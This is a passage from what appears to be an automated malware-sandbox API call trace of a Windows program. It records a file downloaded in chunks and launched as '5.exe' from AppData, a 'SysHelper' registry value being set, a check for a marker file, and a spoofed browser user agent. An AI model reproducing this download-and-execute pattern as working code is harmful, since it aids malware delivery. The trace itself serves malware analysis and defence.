(in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.720] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.721] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.721] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.722] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.722] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.737] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.737] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.737] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.738] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.738] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.738] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.739] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.739] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.739] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.739] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.740] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.740] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.740] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.741] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.742] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.742] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.743] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.743] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.743] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.743] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.744] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.744] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.744] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.744] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.757] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.757] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.757] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.758] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.758] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.758] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.759] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.759] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.760] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.760] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.819] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.819] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.820] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.820] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.820] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.821] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.821] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.821] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.822] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.822] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.822] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.822] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.872] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.873] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.873] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.874] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.874] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.874] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.875] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.875] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.879] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.879] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.880] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.880] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.880] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.881] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.881] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.882] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.882] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.882] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.883] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.883] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.884] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.886] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.886] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.886] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x400) returned 1 [0119.887] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x400, lpOverlapped=0x0) returned 1 [0119.887] CloseHandle (hObject=0x3cc) returned 1 [0119.893] InternetCloseHandle (hInternet=0xcc0024) returned 1 [0119.902] InternetCloseHandle (hInternet=0xcc001c) returned 1 [0119.902] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f1dc0 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3390 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb668 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5850 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5898 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3240 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3400 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3320 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d1860 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0119.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb2a0 | out: hHeap=0x4970000) returned 1 Thread: id = 94 os_tid = 0xafc [0112.612] timeGetTime () returned 0x114ebe4 [0112.612] GetLastError () returned 0x54f [0112.612] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3bc) returned 0x74e4488 [0112.612] GetCurrentThreadId () returned 0xafc [0112.612] SetLastError (dwErrCode=0x54f) [0112.612] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x13f0a5e4 | out: phkResult=0x13f0a5e4*=0x5cc) returned 0x0 [0112.612] RegQueryValueExW (in: hKey=0x5cc, lpValueName="SysHelper", lpReserved=0x0, lpType=0x13f0a5d8, lpData=0x13f0a5e0, lpcbData=0x13f0a5dc*=0x4 | out: lpType=0x13f0a5d8*=0x0, lpData=0x13f0a5e0*=0x0, lpcbData=0x13f0a5dc*=0x4) returned 0x2 [0112.612] RegSetValueExW (in: hKey=0x5cc, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0x13f0a5e0*=0x1, cbData=0x4 | out: lpData=0x13f0a5e0*=0x1) returned 0x0 [0112.612] RegCloseKey (hKey=0x5cc) returned 0x0 [0112.613] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x13f0a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0112.613] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0112.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdba8 [0112.613] AreFileApisANSI () returned 1 [0112.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13f0a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0112.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7a) returned 0x49d2808 [0112.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13f0a4e4, cbMultiByte=-1, lpWideCharStr=0x49d2808, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0112.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x13f0a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0112.614] GetLastError () returned 0x2 [0112.614] GetLastError () returned 0x2 [0112.614] SetLastError (dwErrCode=0x2) [0112.614] GetLastError () returned 0x2 [0112.614] SetLastError (dwErrCode=0x2) [0112.614] GetLastError () returned 0x2 [0112.614] SetLastError (dwErrCode=0x2) [0112.614] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2808 | out: hHeap=0x4970000) returned 1 [0112.614] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0112.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x750be80 [0112.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0x49c7728 [0112.614] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750be80 | out: hHeap=0x4970000) returned 1 [0112.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c37f0 [0112.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x74f21d8 [0112.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x74c37f0, cbMultiByte=-1, lpWideCharStr=0x74f21d8, cchWideChar=1056 | out: lpWideCharStr="333A08A62A835CF5E85B23E934E08F4B") returned 33 [0112.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x850) returned 0x74f9cc8 [0112.614] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0112.614] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c37f0 | out: hHeap=0x4970000) returned 1 [0112.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8a0) returned 0x74f21d8 [0112.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c7728 | out: hHeap=0x4970000) returned 